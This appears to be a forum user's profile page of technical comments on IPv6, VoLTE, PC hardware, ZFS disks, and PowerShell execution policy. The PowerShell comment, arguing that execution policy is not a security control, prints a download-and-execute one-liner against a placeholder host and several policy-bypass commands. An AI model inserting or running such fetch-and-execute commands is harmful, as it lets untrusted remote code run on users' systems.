• 1 Post
  • 15 Comments
Joined 11 months ago
cake
Cake day: July 30th, 2023

help-circle

  • IPv6 isn’t just larger addresses, it was meant to totally remove the need for layer 2 / MAC addresses, bus networks, DHCP, and broadcasts. Since the plan was to get rid of the 12 byte ethernet header, the 24 byte increase in IP addresses would only be a 12 byte increase in header at the end of the day. WiFi wouldn’t need three MAC addresses in every packet. IPv6 only achieves it’s true potential with a complete switch over.

    I personally don’t think that can ever happen. The opportunity to switch everyone over is absolutely long gone. IPv6 isn’t an extension of v4 or a compatible replacement, like ASCII to UTF-8. It’s more like X to Wayland. The protocol authors went “This is a mess we gotta rethink this from scratch”. But there’s so much already relying on the old protocol, and replacing it with something that doesn’t perfectly match features is difficult for little reward for users.

    The increase in IPv6 nodes has mostly been due to mobile networks. The tragedy is they actually still mostly use layer 2 and bridge networking. IPv4 nor v6 can handle maintaining connections while addresses change. So they set it up so that you keep the same IP address as you travel and move between different towers. This is done with massive virtual layer 2 LANs across towers, with the IP routing happening at a central datacentre. IPv6 is simply used for the larger addresses, and none of the network/protocol simplifications it promised can be used.




  • Hardly. As per Microsoft,

    The execution policy isn’t a security system that restricts user actions. For example, users can easily bypass a policy by typing the script contents at the command line when they cannot run a script.

    Or you can run iwr -useb 'https://dodgy-website.com/whateverscriptyouwant.ps1' | iex to execute any script from the internet.

    Or read the file and pass it onto a new powershell process with Get-Content . whateverscriptyouwant.ps1 | PowerShell.exe -noprofile -

    Or use the built-in bypass toggle PowerShell.exe -ExecutionPolicy Bypass -File whateverscriptyouwant.ps1

    Or just actually change the execution policy for the proccess or user, via powershell or registry, because once again, it is not an access control. It is security theatre.


  • Telcos are acting like switching off 3G is no big deal, since LTE has been around since 2012, get with the times! VoLTE has only been around since 2016, and even then, was limited to approved models. And only worked if you bought the phone directly from the telco. And only if you had postpaid plan. And only if your account had a “VoLTE enable” flag set by calling them.

    To this day, when it doesn’t work phone makers and telcos will point the finger at each other, leaving customers with no clue who to chase for a solution. All parties still act like VoLTE is a nice to have and not a requirement. I really believe the rush to deploy 5G was to have the pretence to shut off 3G and force customers to buy new phones.

    I had to root my phone, then use diagnostic serial access to the Qualcomm modem and Russian software to make VoLTE work on my 5G 2020 phone. I fear BYO mobile plans are dead now, buying direct from telcos is the only way they’ll help you be able to make calls on your phone.


  • A lot of desktop motherboards have a slot for a M.2 WiFi card like that AX200. Usually though they already come with a card anyway. You can often also use the same ssd/HDDs going from laptop to desktop. CPU, RAM, and GPUs are different sizes and connectors though, and won’t be transferrable.

    Main thing for choosing a mac is the personal preference for the OS / interface. Its not totally better than Windows, there’s pros and cons. You have to really want it to pay for the overpriced hardware. Even second hand they retain a lot resale value.









  • Huh annoying. You can run zdb -C TheMass To get more info about the pool and the disks in it. Might list enough disk detail to give you confidence it’s using the layout you want.

    For me identifying disks usually ends up being unplugging them one by one and checking which shows OFFLINE. Could be worth the trouble to know for sure its specifying and using the disks.

    In any case a good time to setup a backup for anything you can’t replace.